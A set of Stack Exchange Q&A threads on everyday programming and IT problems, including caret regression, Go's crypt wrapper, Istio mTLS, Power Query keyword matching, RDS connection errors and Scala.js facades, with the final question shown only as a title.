Logistic Regression in Caret - No Intercept?

Q: Performing logistic regression in R using the caret package, and trying to force a zero intercept such that the probability at x=0 is 0.5. In other forms of regression, it seems you can turn the intercept off using tuneGrid, but that has no such functionality for logistic regression. Any ideas?

```r
model <- train(y ~ 0 + x, data = data, method = "glm",
               family = binomial(link = "probit"), trControl = train.control)
```

And yes, I "know" that the probability at x=0 should be 0.5, and am thus trying to force it.

Comment: You said logistic regression multiple times, but your code implies probit regression. It doesn't really make a difference; just wondering if there's a reason for that.

A: There's a vignette on how to set up a custom model for caret. In the solution below, you can also see why the intercept persists:

```r
library(caret)
glm_wo_intercept <- getModelInfo("glm", regex = FALSE)[[1]]
```

If you look at the fit function (`glm_wo_intercept$fit`), there's a line that reads:

```r
modelArgs <- c(list(formula = as.formula(".outcome ~ ."), data = dat), theDots)
```

So the intercept is there by default. You can change this line and run caret on the modified model:

```r
glm_wo_intercept$fit <- function(x, y, wts, param, lev, last, classProbs, ...) {
  dat <- if (is.data.frame(x)) x else as.data.frame(x)
  dat$.outcome <- y
  if (length(levels(y)) > 2) stop("glm models can only use 2-class outcomes")
  theDots <- list(...)
  if (!any(names(theDots) == "family")) {
    theDots$family <- if (is.factor(y)) binomial() else gaussian()
  }
  if (!is.null(wts)) theDots$weights <- wts
  # change the formula here to drop the intercept
  modelArgs <- c(list(formula = as.formula(".outcome ~ 0 + ."), data = dat), theDots)
  out <- do.call("glm", modelArgs)
  out$call <- NULL
  out
}
```

We fit the model:

```r
data <- data.frame(y = factor(runif(100) > 0.5), x = rnorm(100))
model <- train(y ~ 0 + x, data = data, method = glm_wo_intercept,
               family = binomial(), trControl = trainControl(method = "cv", number = 3))
predict(model, data.frame(x = 0), type = "prob")
#   FALSE TRUE
# 1   0.5  0.5
```
common-pile/stackexchange_filtered
'mysql' is not recognized as an internal or external command, operable program or batch file

Q: Please help me.

```shell
D:\wamp>cd D:\wamp\bin\mysql\mysql5.6.17

D:\wamp\bin\mysql\mysql5.6.17>set path=%PATH%;D:\wamp\bin\mysql\mysql5.6.17

D:\wamp\bin\mysql\mysql5.6.17>mysql -u root -p
'mysql' is not recognized as an internal or external command,
operable program or batch file.

D:\wamp\bin\mysql\mysql5.6.17>
```

A: Maybe the "bin" subdirectory is missing from your path? The executable lives in D:\wamp\bin\mysql\mysql5.6.17\bin.

A: It seems you have to specify the full path to the MySQL program itself (mysql.exe). Use:

```shell
D:\wamp\bin\mysql\mysql5.6.17\bin\mysql.exe -u username -p
```
common-pile/stackexchange_filtered
What is Go's equivalent to Python's crypt.crypt?

Q: I am currently playing around with an example from the book Violent Python (you can see my implementation here). I am now trying to implement the same script in Go to compare performance; note I am completely new to Go. Opening the file and iterating over the lines is fine, but I cannot figure out how to use the "crypto" library to hash the string in the same way as Python's crypt.crypt(str_to_hash, salt). I thought it might be something like:

```go
import "crypto/des"

des.NewCipher([]byte("abcdefgh"))
```

However, no cigar. Any help would be much appreciated, as it'd be really interesting to compare Go's parallel performance to Python's multithreaded version.

Edit: Python docs for crypt.crypt

Comment: "Python's multithreaded" -- 'nuff said.

Reply: I'm aware it is not testing like for like; I'm just interested to see how much faster Go will be. Likely at least an order of magnitude, I'm guessing.

Comment: Be careful comparing Go's concurrent performance with Python's multithreading. Potentially, you'd see Go running more slowly, because the Go runtime may actually use fewer (or only one) OS threads, so the goroutines are being timesliced onto CPU core(s). The difference between concurrency and parallelism is a good feature of Go, but you could get caught out.
More: http://golang.org/doc/effective_go.html#parallel

A: crypt is very easy to wrap with cgo, e.g.:

```go
package main

import (
	"fmt"
	"unsafe"
)

// #cgo LDFLAGS: -lcrypt
// #define _GNU_SOURCE
// #include <crypt.h>
// #include <stdlib.h>
import "C"

// crypt wraps the C library's crypt_r
func crypt(key, salt string) string {
	data := C.struct_crypt_data{}
	ckey := C.CString(key)
	csalt := C.CString(salt)
	out := C.GoString(C.crypt_r(ckey, csalt, &data))
	C.free(unsafe.Pointer(ckey))
	C.free(unsafe.Pointer(csalt))
	return out
}

func main() {
	fmt.Println(crypt("abcdefg", "aa"))
}
```

Which produces this when run:

    aaTcvO819w3js

Which is identical to Python's crypt.crypt:

```python
>>> from crypt import crypt
>>> crypt("abcdefg", "aa")
'aaTcvO819w3js'
```

(Updated to free the CStrings -- thanks @james-henstridge.)

Comment: The OP wanted to compare the speed of a Python implementation to a Go implementation. With this approach he would be benchmarking the C implementation against the same C implementation -- effectively just benchmarking Python's C wrapper against Go's C wrapper.

Reply: The OP specifically wanted to compare the parallel performance of crypt in Python and crypt in Go. This will give a good comparison of the differing concurrency capabilities, since they will be using the same C library underneath.

Comment: IMHO it would be fairer to benchmark parallel performance with native code. The concurrency capabilities of a language may be limited when using an external non-native library (for example, with Go, the Go scheduler cannot do anything while an OS thread is running external library code). OTOH, if the algorithm is implemented in native code, it will be difficult to limit the benchmark to comparing only the concurrency capabilities, as the resulting code will differ due to language/compiler/interpreter differences. This is a harder problem than I initially thought.

Comment: It looks like you're leaking the C.CString versions of key and salt. You will need to explicitly free those values.
A: I believe there isn't currently any publicly available package for Go which implements the old-fashioned Unix "salted", DES-based crypt() functionality. This is different from normal symmetric DES encryption/decryption, which is implemented in the "crypto/des" package (as you have discovered). You would have to implement it on your own. There are plenty of existing implementations in different languages (mostly C), for example in the FreeBSD sources or in glibc. If you implement it in Go, please publish it. :)

For new projects it is much better to use a stronger password hashing algorithm, such as bcrypt. A good implementation is available in the go.crypto repository; the documentation is available here. Unfortunately this does not help if you need to work with pre-existing legacy password hashes.

Edited to add: I had a look at Python's crypt.crypt() implementation and found out that it is just a wrapper around the libc implementation. It would be simple to implement the same wrapper for Go. However, your idea of comparing a Python implementation to a Go implementation is already ruined: you would have to implement both of them yourself to make any meaningful comparison. E.g.:

```go
package main

import (
	"crypto/des"
	"fmt"
	"log"
)

func main() {
	b, err := des.NewCipher([]byte("abcdefgh"))
	if err != nil {
		log.Fatal(err)
	}
	msg := []byte("Hello!?!")
	fmt.Printf("% 02x: %q\n", msg, msg)
	b.Encrypt(msg, msg)
	fmt.Printf("% 02x: %q\n", msg, msg)
	b.Decrypt(msg, msg)
	fmt.Printf("% 02x: %q\n", msg, msg)
}
```

(Also: http://play.golang.org/p/czYDRjtWNR)

Output:

    48 65 6c 6c 6f 21 3f 21: "Hello!?!"
    3e 41 67 99 2d 9a 72 b9: ">Ag\x99-\x9ar\xb9"
    48 65 6c 6c 6f 21 3f 21: "Hello!?!"

Comment: Thanks for this, it's really useful to have a fully working example. In Python one would pass the string to encrypt and an optional two-char salt, e.g. crypt.crypt('abc', '12') -> '12BWKETBcM70Q'; however, the above example does not return the same.
Does the returned cipher.Block need to be cast to crypto.Hash to achieve the same?

Reply: That is not relevant to the question. Symmetric DES encryption is somewhat different from the traditional Unix crypt() function (which is DES-based with some salt mixed in, but certainly not the same).

Comment: My bad, I should have been more explicit in my question. Python's crypt.crypt() runs the crypt(3) password hash, standard in Unix password hashing. crypt(3) is a variant on DES.

A: Good news! There's actually an open-source implementation of what you're looking for. Osutil has a crypt package that reimplements crypt in pure Go: https://github.com/kless/osutil/tree/master/user/crypt
common-pile/stackexchange_filtered
Running Play Framework 2.0 in Windows, got a NoClassDefFoundError

Q: I'm trying to run Play Framework 2.0 on Windows (XP), but when I launch play, I get this exception:

```shell
>play.bat
Exception in thread "main" java.lang.NoClassDefFoundError: and
Caused by: java.lang.ClassNotFoundException: and
        at java.net.URLClassLoader$1.run(Unknown Source)
        at java.security.AccessController.doPrivileged(Native Method)
        at java.net.URLClassLoader.findClass(Unknown Source)
        at java.lang.ClassLoader.loadClass(Unknown Source)
        at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source)
        at java.lang.ClassLoader.loadClass(Unknown Source)
Could not find the main class: and.  Program will exit.
```

I can't find why I have this error. Of course I have Java installed:

```shell
>java -version
java version "1.6.0_31"
Java(TM) SE Runtime Environment (build 1.6.0_31-b05)
Java HotSpot(TM) Client VM (build 20.6-b01, mixed mode, sharing)
```

And javac:

```shell
>javac -version
javac 1.6.0_31
```

What am I missing?

A: OK, for those who have the same problem, it's quite simple in fact. I was running Play in "My Documents", and the whole path contained spaces. For Play! to work, you have to put your project in a folder without spaces, like C:\dev\play\2.0\, and it will work. :)

Comment: I suggest you create a ticket for this on https://play.lighthouseapp.com/dashboard
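The accepted answer also explains why the missing class is literally named "and": a Windows path like "Documents and Settings" contains the bare word "and", and when the launch script builds the java command line without quoting, the shell splits the classpath at spaces, so "and" ends up parsed as the main-class argument. A minimal sketch of that failure mode (the path and main class below are hypothetical, for illustration only):

```python
# Why an unquoted path with spaces yields "NoClassDefFoundError: and".
# The classpath and main class are made-up examples, not Play's real ones.
classpath = r"C:\Documents and Settings\user\My Documents\play-2.0\framework\play.jar"
command = f"java -cp {classpath} play.console.Console"

# Naive whitespace splitting, as a batch script does with unquoted variables:
tokens = command.split()

# java treats the token right after the -cp value as the class to run,
# and the -cp value itself was cut short at the first space.
main_class = tokens[tokens.index("-cp") + 2]
print(main_class)  # -> and
```

This is also why moving the project to a space-free path like C:\dev\play\2.0\ (or quoting every path expansion in the script) fixes it.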
common-pile/stackexchange_filtered
2013 MBP unable to see new internal SSD

Q: I have a 2013 MBP that I'm trying to set up to give to my friend. I've been running a 500GB Samsung Evo 850 for a few years, and I'm now trying to put a 250GB one in. I've managed to install macOS High Sierra onto it while it was in a USB enclosure I've got, and the machine boots just fine off of my original SSD, so I don't think it's the cable or the SSD. I've been installing from a USB installer I made using my new MacBook. I've also reset the SMC and PRAM.

EDIT: No idea what's going on. I've given up and left the 500GB drive in the computer, while I keep the 250GB with my stuff on it on the side.

Comment: Does Disk Utility see it?

Reply: No, not even when showing all devices.

Comment: Is the new SSD properly formatted? I've had issues before where the drive was still FAT (or whatever), but the Mac partition was properly formatted and looked OK.

Reply: It doesn't show even when I click "show all drives"; my old SSD does, and is fine. When I boot off of the USB and go into Disk Utility, I can't even format it there -- I had to format it from another computer. The machine also boots off of it: I got to the OS setup screen when it was attached via USB, so the OS is installed. It was also formatted as Mac OS Extended (Journaled) with a GUID partition map.
common-pile/stackexchange_filtered
mTLS between services running inside and outside a mesh using Istio's trust chain

Q: I understand that I can configure Istio so that its Citadel component uses a root X.509 certificate + private key that I provide. Can I extend this system so that I also use the same root to issue certificates to legacy workloads running in the same k8s cluster, and then configure a destination rule to access these workloads from inside the mesh? Something like:

```yaml
---
apiVersion: networking.istio.io/v1alpha3
kind: DestinationRule
metadata:
  name: originate-mtls
spec:
  host: mymtls-app.legacy.svc.cluster.local
  trafficPolicy:
    portLevelSettings:
    - port:
        number: 8443
      tls:
        mode: ISTIO_MUTUAL
        sni: mymtls-app.legacy.svc.cluster.local
```

Can the above work? Do I need any additional configuration besides the above?

I may not be in a position to run SPIFFE/SPIRE to manage the certificates for workloads outside the mesh, which puts a SPIFFE-federation solution somewhat out of reach for me -- and it doesn't seem like a fully supported mechanism in any case. I have been able to configure mTLS using a separate certificate hierarchy, which I have to inject via secrets and mount into the pods/sidecars in question (illustrated here).

A: If you are using your own certificates, then you need to use mode: MUTUAL and the related attributes; see https://istio.io/latest/docs/reference/config/networking/destination-rule/

Comment: @NatarajMedayhal, what does the DestinationRule documentation link add to the discussion? Could you point out which specific section or line is relevant to the question above?

Reply: If you want to use your own certificates and private keys instead of Citadel, then you need to use mode: MUTUAL; the link lists the attributes which need to be set. If the mode is ISTIO_MUTUAL, Istio generates those automatically.
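A sketch of what the answer suggests -- originating plain MUTUAL TLS with certificates you manage yourself rather than Istio-issued ones. The file paths here are assumptions: they must match wherever the client certificate, key, and root CA are actually mounted into the sidecar (e.g. from a Kubernetes secret):

```yaml
apiVersion: networking.istio.io/v1alpha3
kind: DestinationRule
metadata:
  name: originate-mtls-own-certs
spec:
  host: mymtls-app.legacy.svc.cluster.local
  trafficPolicy:
    portLevelSettings:
    - port:
        number: 8443
      tls:
        mode: MUTUAL                                  # not ISTIO_MUTUAL
        clientCertificate: /etc/certs/cert-chain.pem  # assumed mount path
        privateKey: /etc/certs/key.pem                # assumed mount path
        caCertificates: /etc/certs/root-cert.pem      # assumed mount path
        sni: mymtls-app.legacy.svc.cluster.local
```

With ISTIO_MUTUAL those three file fields must be left unset, since the proxy automatically uses its Istio-provisioned identity instead.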
common-pile/stackexchange_filtered
Microwave links

Q: If the record for microwave links is 235 km long, and microwaves must travel in a straight line (and cannot go through solids, such as the sea or objects in between), then how did they account for the curvature of the Earth? Over 235 km there should be too much curvature to see the receiver pole. The scenario is explained at 10:17 in this video: https://www.youtube.com/watch?v=PZcrSyMM1ZM&t=705s

A: A lot of the long-distance links are over bodies of water, e.g. the Red Sea. The refractive index of air is slightly greater than one and decreases with height. Due to this vertical change in refractive index, the microwaves undergo refraction, so their path is not a straight line. (The images came from Point-to-Point Radio Link Engineering.)
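The effect of refraction can be put in rough numbers with the standard radio-horizon approximation d ≈ √(2kRh) per antenna, where R is the Earth's radius and k is the effective Earth-radius factor (k = 1 for pure straight-line geometry, k ≈ 4/3 for a standard atmosphere). A sketch, assuming equal antenna heights at both ends of the 235 km path:

```python
EARTH_RADIUS_M = 6_371_000  # mean Earth radius in metres
LINK_KM = 235               # record link length from the question

def required_height_m(link_km: float, k: float) -> float:
    """Height each antenna needs so the two radio horizons just meet.

    Uses the horizon distance d = sqrt(2*k*R*h) per end; with equal
    heights, each end must cover half the path, so h = (d/2)^2 / (2*k*R).
    """
    half_path_m = link_km * 1000 / 2
    return half_path_m ** 2 / (2 * k * EARTH_RADIUS_M)

geometric = required_height_m(LINK_KM, k=1.0)   # straight-line sight, ~1080 m
refracted = required_height_m(LINK_KM, k=4/3)   # standard refraction, ~810 m

print(f"no refraction: {geometric:.0f} m, with k=4/3 refraction: {refracted:.0f} m")
```

So standard refraction alone cuts roughly a quarter off the required antenna height, and over water -- where the refractive index can fall with height faster than the k = 4/3 assumption (ducting) -- even longer paths become workable.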
common-pile/stackexchange_filtered
Power Query function to search for matching keywords in a table of lists and return the text in the cell in front of the matching row

Q: I have a similar problem, but a bit more complex, to this one: "Power Query: Function to search a column for a list of keywords and return only rows with at least one match", and this one: https://community.powerbi.com/t5/Desktop/Power-query-Add-column-with-list-of-keywords-found-in-text/td-p/83109

I have a database with a lot of columns, one of which is a free-text description string. On another Excel sheet in the workbook, I've set up a matching table to categorize the rows based on lists of keywords, like this:

    category | keywords
    pets     | dog, cat, rabbit, ...
    cars     | Porsche, BMW, Dodge, ...

The goal is to add a custom column to my database that returns the above category (or categories?) based on which listed keywords it can find in the description field. I think the solutions above, and the one from ImkeF, are not far off, but I haven't found a way to turn them into a successful query for my case. (I'm good at Excel but quite a noob at M and programming queries...)

A: Oriented on the above-posted links. M code for tbl_category; the keywords (separated by commas) are split into rows:

```
let
    Source = Excel.CurrentWorkbook(){[Name="tbl_category"]}[Content],
    #"Replaced Value" = Table.ReplaceValue(Source," ","",Replacer.ReplaceText,{"keywords"}),
    #"Split Column by Delimiter" = Table.ExpandListColumn(Table.TransformColumns(#"Replaced Value", {{"keywords", Splitter.SplitTextByDelimiter(",", QuoteStyle.Csv), let itemType = (type nullable text) meta [Serialized.Text = true] in type {itemType}}}), "keywords"),
    #"Changed Type1" = Table.TransformColumnTypes(#"Split Column by Delimiter",{{"keywords", type text}})
in
    #"Changed Type1"
```

M code for tbl_text.
Here a custom column called "Category" will be added:

```
let
    Source = Excel.CurrentWorkbook(){[Name="tbl_text"]}[Content],
    #"Changed Type" = Table.TransformColumnTypes(Source,{{"Text", type text}}),
    #"Added Custom" = Table.AddColumn(#"Changed Type", "Category", (Earlier) => Table.SelectRows(tbl_category, each Text.Contains(Record.Field(Earlier, "Text"), Record.Field(_, "keywords"), Comparer.OrdinalIgnoreCase))),
    #"Expanded Category" = Table.ExpandTableColumn(#"Added Custom", "Category", {"Category"}, {"Category"})
in
    #"Expanded Category"
```

Comment: Hi, thanks a lot for your answer... but I haven't succeeded yet. The first code works as expected (but the resulting table is not shown in your screenshot). The second code doesn't work with "tbl_category" (which is illustrated in your screenshot), so I tried replacing "(Earlier) => Table.SelectRows(tbl_category," to point to the resulting table of the first code. That way it doesn't give any error, but the resulting column is full of "null", even though there is a table (2 columns and one or many rows) in each cell before the use of Table.ExpandTableColumn, and I don't know why. BTW, I would also like to avoid creating more rows in the resulting table, and would prefer to retrieve the matching categories as text in the resulting "Category" column.

Comment: All right... I hadn't noticed that the first {"Category"} in Table.ExpandTableColumn(#"Added Custom", "Category", {"Category"}, {"Category"}) was the name of the column in the nested table. I made the correction and now it works as you described. :) I now just need to avoid the row duplication, and to retrieve a de-duplicated list of the matching categories as a text string in the result column. I tried replacing Table.Expand with Table.Split, List.FromTable, etc., but haven't found something that works.

Comment: OK, I've finally found how to build a query that suits my needs based on your steps above! Note: I replaced the column header of the first tbl_category column with "Row Labels" for clarity.
My solution is not as neat as I would like (I had to create a second custom column because of my lack of knowledge of how to nest the two steps so they act on the same cell), but it works perfectly! So thanks again for your help, Chris... without your leads I wouldn't have found the exit to this maze! Here is the second code, modified:

```
let
    Source = Excel.CurrentWorkbook(){[Name="tbl_text"]}[Content],
    #"Changed Type" = Table.TransformColumnTypes(Source,{{"Text", type text}}),
    #"Added Custom" = Table.AddColumn(#"Changed Type", "Category", (Earlier) => Table.SelectRows(tbl_category, each Text.Contains(Record.Field(Earlier, "Text"), Record.Field(_, "keywords"), Comparer.OrdinalIgnoreCase))),
    #"Added Custom1" = Table.AddColumn(#"Added Custom", "Custom", each Text.Combine(Table.ToList(Table.Transpose(Table.Distinct(Table.SelectColumns([Category],{"Row Labels"}))), Combiner.CombineTextByDelimiter(",")), ", "))
in
    #"Added Custom1"
```

Greetz

Reply: Looks like you did it. :)

Comment: Just for the record: once applied to real data, the query stopped working, giving the error "We cannot convert the value null to type Text." The solution was as easy as first removing the "null" cells (blank cells for categories for which no keywords had yet been identified). M code for tbl_category:

```
let
    Source = Excel.CurrentWorkbook(){[Name="tbl_category"]}[Content],
    #"Filtered Rows" = Table.SelectRows(Source, each ([keywords] <> null)),
    #"Replaced Value" = Table.ReplaceValue(#"Filtered Rows"," ","",Replacer.ReplaceText,{"keywords"}),
    #"Split Column by Delimiter" = Table.ExpandListColumn(Table.TransformColumns(#"Replaced Value", {{"keywords", Splitter.SplitTextByDelimiter(",", QuoteStyle.Csv), let itemType = (type nullable text) meta [Serialized.Text = true] in type {itemType}}}), "keywords"),
    #"Changed Type1" = Table.TransformColumnTypes(#"Split Column by Delimiter",{{"keywords", type text}})
in
    #"Changed Type1"
```

Greetz
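For readers more at home outside of M, the logic the queries above implement -- split each category's comma-separated keyword list into rows, scan the free text case-insensitively, and combine the distinct matching categories into one string -- can be sketched like this (the table name and sample keywords mirror the question's example, not a real workbook):

```python
# Hypothetical stand-in for tbl_category: category -> comma-separated keywords
tbl_category = {
    "pets": "dog, cat, rabbit",
    "cars": "Porsche, BMW, Dodge",
}

# Split the keyword lists into (keyword, category) rows, as the first M query does
keyword_rows = [
    (kw.strip().lower(), category)
    for category, kws in tbl_category.items()
    for kw in kws.split(",")
]

def categorize(text: str) -> str:
    """Return the distinct matching categories, comma-joined (may be empty)."""
    found = []
    lowered = text.lower()
    for keyword, category in keyword_rows:
        if keyword and keyword in lowered and category not in found:
            found.append(category)
    return ", ".join(found)

print(categorize("Saw a dog chase a BMW"))  # -> pets, cars
print(categorize("Nothing relevant here"))  # -> (empty string)
```

Like the M version with Text.Contains plus Comparer.OrdinalIgnoreCase, this is a plain substring match, so "dog" would also match inside "dogma" -- word-boundary matching would need an extra check in both versions.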
common-pile/stackexchange_filtered
Toggle switch does not change its state (ASP.NET MVC)

Q: I have a toggle switch in my view. Here is the code:

```css
.switch {
  position: relative;
  display: inline-block;
  width: 60px;
  height: 34px;
}

.switch input { display: none; }

.slider {
  position: absolute;
  cursor: pointer;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background-color: #ccc;
  -webkit-transition: .4s;
  transition: .4s;
}

.slider:before {
  position: absolute;
  content: "";
  height: 26px;
  width: 26px;
  left: 4px;
  bottom: 4px;
  background-color: white;
  -webkit-transition: .4s;
  transition: .4s;
}

input:checked + .slider {
  background-color: #2196F3;
}

input:focus + .slider {
  box-shadow: 0 0 1px #2196F3;
}

input:checked + .slider:before {
  -webkit-transform: translateX(26px);
  -ms-transform: translateX(26px);
  transform: translateX(26px);
}

/* Rounded sliders */
.slider.round {
  border-radius: 34px;
}

.slider.round:before {
  border-radius: 50%;
}
```

```html
<div id="switcher" class="doctors-appointment">
  <div class="Row">
    <div class="Column">
      <b>Doctor's appointment</b>
    </div>
    <div class="Column">
      <label class="switch">
        <input type="checkbox">
        <span class="slider round"></span>
      </label>
    </div>
    <div class="Column">
      <b>For internal purposes</b>
    </div>
  </div>
</div>
```

In this snippet everything is OK, but when I run it on my machine the toggle switch does not change its state, and I have no errors in the console. I tried creating a new CSS file for the toggle and including it in the view, but that did not help. What might the problem be? Thanks for the help.

Comment: What does this have to do with ASP.NET?

Reply: The project is ASP.NET. @Marco

Comment: And what do you mean by "it does not change state"? Does the checkbox not work, or do the CSS styles not get applied?

Reply: It is always grey and doesn't change state. @Marco

Comment: Your code does work here on Stack Overflow, which means you are not showing us everything.

Comment: @SukhomlinEugene, did you ever solve your issue with the toggle switch? When you submit your form, does it submit the correct value based on the on/off state?
common-pile/stackexchange_filtered
PDF link goes to "Cannot GET file" with a 404 error

Q: I am trying to have a link open a PDF. I have href="filename.pdf", and the PDF file is in the same folder as the HTML file. When I click the link, it opens a new page (I have it set to open a new page) which says "Cannot GET /filename.pdf". The console says "Failed to load resource: the server responded with a status of 404 (Not Found)". I found a solution that works, but I don't understand why.

This doesn't work:

```html
<a target="_blank" class="cta-btn cta-btn--resume" href="connerschiller.pdf">View Resume</a>
```

But this does:

```html
<a target="_blank" class="cta-btn cta-btn--resume" href="../src/connerschiller.pdf">View Resume</a>
```

The HTML file is in the src folder as well.

Edit: The fix listed above works when I run the site locally, but when I open the PDF link on the deployed site on Netlify, it says "Page Not Found -- Looks like you've followed a broken link or entered a URL that doesn't exist on this site."

Comment: Could you please add some code?

Reply: Well, I sort of found an answer: I had to move back out of the folder and then go back into the same folder, and then it worked. That just doesn't make sense to me, but I'll add the line of code to my question.

Comment: Do you perhaps have a src folder and another one, like "build", where the HTML is? I think the problem is not in your markup but in the file structure.

A: If the file is in the same directory, you need to reference it as follows; the ./ specifies the same directory:

```html
<a href="./filename.pdf">My pdf</a>
```
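One way to see why the ../src/ href happens to work locally is to resolve the URLs: if the dev server's root is the project folder rather than src/, the plain href resolves to the site root (where the PDF is not), while the extra ../ is normalized away at the root and the path then descends into /src. A sketch with Python's standard URL resolver (the localhost URL is an assumption about the dev-server setup):

```python
from urllib.parse import urljoin

# Assume the dev server serves the project root, and the page URL is at /
page = "http://localhost:3000/"

# Plain relative href resolves against the site root:
print(urljoin(page, "connerschiller.pdf"))
# -> http://localhost:3000/connerschiller.pdf   (404 if the file lives in /src)

# "../" at the root is discarded during normalization (RFC 3986),
# so the path simply descends into /src, where the file actually is:
print(urljoin(page, "../src/connerschiller.pdf"))
# -> http://localhost:3000/src/connerschiller.pdf
```

This also suggests why the same href breaks on Netlify: the deployed site root is typically the build output, with no src/ folder at all, so the robust fix is to put the PDF in the publish directory and link it relative to the page.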
common-pile/stackexchange_filtered
Unable to connect to Amazon RDS instance

Q: I am trying to connect to an RDS instance from my MacBook (M1, Sonoma 14.2.1) and keep running into this error. Initially I thought the problem was that my instance was not publicly accessible, which I have now changed. Error message:

```
Unable to connect to the database: HostNotFoundError [SequelizeHostNotFoundError]: getaddrinfo ENOTFOUND your_amazon_rds_host
    at Client._connectionCallback (/Users/as/Desktop/sample_app/node_modules/sequelize/lib/dialects/postgres/connection-manager.js:134:24)
    at Client._handleErrorWhileConnecting (/Users/as/Desktop/sample_app/node_modules/pg/lib/client.js:327:19)
    at Client._handleErrorEvent (/Users/as/Desktop/sample_app/node_modules/pg/lib/client.js:337:19)
    at Connection.emit (node:events:519:28)
    at Socket.reportStreamError (/Users/as/Desktop/sample_app/node_modules/pg/lib/connection.js:58:12)
    at Socket.emit (node:events:519:28)
    at emitErrorNT (node:internal/streams/destroy:169:8)
    at emitErrorCloseNT (node:internal/streams/destroy:128:3)
    at process.processTicksAndRejections (node:internal/process/task_queues:82:21) {
  parent: Error: getaddrinfo ENOTFOUND your_amazon_rds_host
      at GetAddrInfoReqWrap.onlookupall [as oncomplete] (node:dns:118:26) {
    errno: -3008,
    code: 'ENOTFOUND',
    syscall: 'getaddrinfo',
    hostname: 'your_amazon_rds_host'
  },
  original: Error: getaddrinfo ENOTFOUND your_amazon_rds_host
      at GetAddrInfoReqWrap.onlookupall [as oncomplete] (node:dns:118:26) {
    errno: -3008,
    code: 'ENOTFOUND',
    syscall: 'getaddrinfo',
    hostname: 'your_amazon_rds_host'
  }
}
```

For what it's worth, here are some relevant details I have included in my .env file.

AWS RDS instance:

    Endpoint: database-1.servername.us-east-1.rds.amazonaws.com
    Username: postgres
    Password: RandomPassword
    DB instance identifier: database-1
    Database port: 5432

Security group inbound rules:

    Type: All traffic
    Protocol: All
    Port range: All

What am I missing?
Comment: When you say that you are "constantly running into this error", do you mean that it sometimes gives the error, or that it has always given an error? That is, have you ever been able to connect to the RDS database? The first thing would be to check whether you can resolve the DNS name: you can use `nslookup database-1.servername.us-east-1.rds.amazonaws.com`, or you can `ping database-1.servername.us-east-1.rds.amazonaws.com` and see whether it displays an IP address (ignore whether the ping itself works). Let us know how it goes! Also, please edit your question and include the configuration of the security group inbound rules.

Reply: Thanks -- I have added the rules now. It is always an error; I have not seen it work at all. It does appear that I can resolve the DNS name, since when I pinged the database it showed me an IP address, although the ping itself failed.

Comment: You might want to compare what you did with the steps shown in "Unable to connect to public RDS instance". Also, try using a different program to connect to Postgres -- it might give a friendlier error message.

Comment: There is an inconsistency here: you are trying to connect to hostname 'your_amazon_rds_host', but the instance name you have noted is database-1, and the endpoint is database-1.servername.us-east-1.rds.amazonaws.com. What is the actual public hostname?

Comment: When you made your instance publicly available, did you use the --apply-immediately flag? Otherwise it won't change until the next maintenance window.

Comment: Can you post your Sequelize code, i.e. how you're connecting? Where have you defined your_amazon_rds_host? syscall: 'getaddrinfo' is telling you that the getaddrinfo() function basically can't get an IP for your_amazon_rds_host.

A: The error message you are encountering (getaddrinfo ENOTFOUND your_amazon_rds_host) calls for checking all of these: the RDS instance status, the correct hostname or IP address, and the security group and firewall settings.

Reply: Thanks for your response.
The RDS instance status is "Available". The hostname is copied directly from the dashboard, and is correct. I am not sure what to look for in the security group, but I see "default", and "1 permission entry" under "Inbound rules count".

A: Check the VPC and subnet in which you created your RDS instance: is it a public subnet or a private subnet? Use a public subnet. Check the NACL and route table settings too -- the default ones allow all traffic, but newly created ones block everything. Is there an internet gateway attached to your route table? One is required for internet connectivity.

A: I'd advise doing the basic checks to confirm that your machine can reach the database; the error seems to be coming from your application and not the database. Forget about connecting to the database for a second:

1. Confirm that there is no typo in the hostname you are connecting to.
2. Confirm that the hostname can be resolved to an IP on your Mac: do an nslookup of the hostname from your terminal.
3. Try pinging the hostname or IP to confirm whether you get a response.
4. Try to telnet to the hostname/IP on the port it listens on.

We will know where to focus our attention (application, network, or database) after doing these checks.
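Note that the hostname in the stack trace is literally the string your_amazon_rds_host -- a placeholder -- which suggests the real endpoint from the .env file never reached Sequelize (e.g. a mistyped variable name, or dotenv not loaded before the connection is created). The resolution checks suggested above can be sketched as a pre-flight test; the hostnames here are illustrative:

```python
import socket

def can_resolve(hostname: str) -> bool:
    """Return True if DNS can resolve the hostname to an IP address."""
    try:
        socket.gethostbyname(hostname)
        return True
    except socket.gaierror:  # the same failure Node surfaces as ENOTFOUND
        return False

# The literal placeholder from the error message should not resolve
# on a normally configured resolver:
print(can_resolve("your_amazon_rds_host"))

# The real endpoint copied from the RDS console should resolve once the
# instance is publicly accessible (this one is the question's redacted example):
print(can_resolve("database-1.servername.us-east-1.rds.amazonaws.com"))
```

If the real endpoint resolves but the connection still fails, the next suspects are the security group, subnet, and route table checks above rather than DNS.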
common-pile/stackexchange_filtered
How to allow a dynamic interface for a native JS trait in Scala 3?

Q: The following facade trait for three.js works fine with Scala 2:

```scala
@js.native
trait Uniforms extends js.Object with Dynamic {
  @JSBracketAccess
  def update(name: String, uniform: Uniform): Unit

  @JSBracketAccess
  def apply(name: String): Uniform

  @JSName("remove")
  def -=(name: String): Uniform

  @JSBracketAccess
  def selectDynamic(name: String): Uniform

  @JSBracketAccess
  def updateDynamic(name: String)(value: Uniform): Unit
}
```

It allows me to use uniforms both as u("opacity").value = 0.5 and u.opacity.value = 0.5. The trouble is that it does not work with Scala 3. It compiles fine, but it produces an error while linking (fastOptJS):

```
[error] scala.Dynamic (of kind Interface) is not a valid interface implemented by threejs.Uniforms (of kind AbstractJSType)
[error]   called from threejs.Uniforms
```

How can I define a facade for a native JS type in Scala 3 so that I can use it as Dynamic? Deriving from js.Dynamic is not possible, as it is sealed.

A: That's a bug in Scala 3. Please report it at https://github.com/lampepfl/dotty/issues/new/choose

Comment: Done, in https://github.com/lampepfl/dotty/issues/19528

Comment: I guess fixing this will take some time -- Scala 3 releases are not very frequent. It would be nice to know what workaround options there are until the fix is available.

Reply: I don't think there is any workaround besides calling u("opacity") instead of u.opacity. In theory you could write a preprocessor for the IR generated for Uniforms to remove scala.Dynamic from its list of interfaces, but that is probably too much effort. Depending on your setup, you could also put Uniforms.scala in a Scala 2.13 project and depend on it from Scala 3 (this works, and is why js.Dynamic works in the first place from Scala 3).
common-pile/stackexchange_filtered
jQuery - Can you stop a div from updating until an action in the div is done?

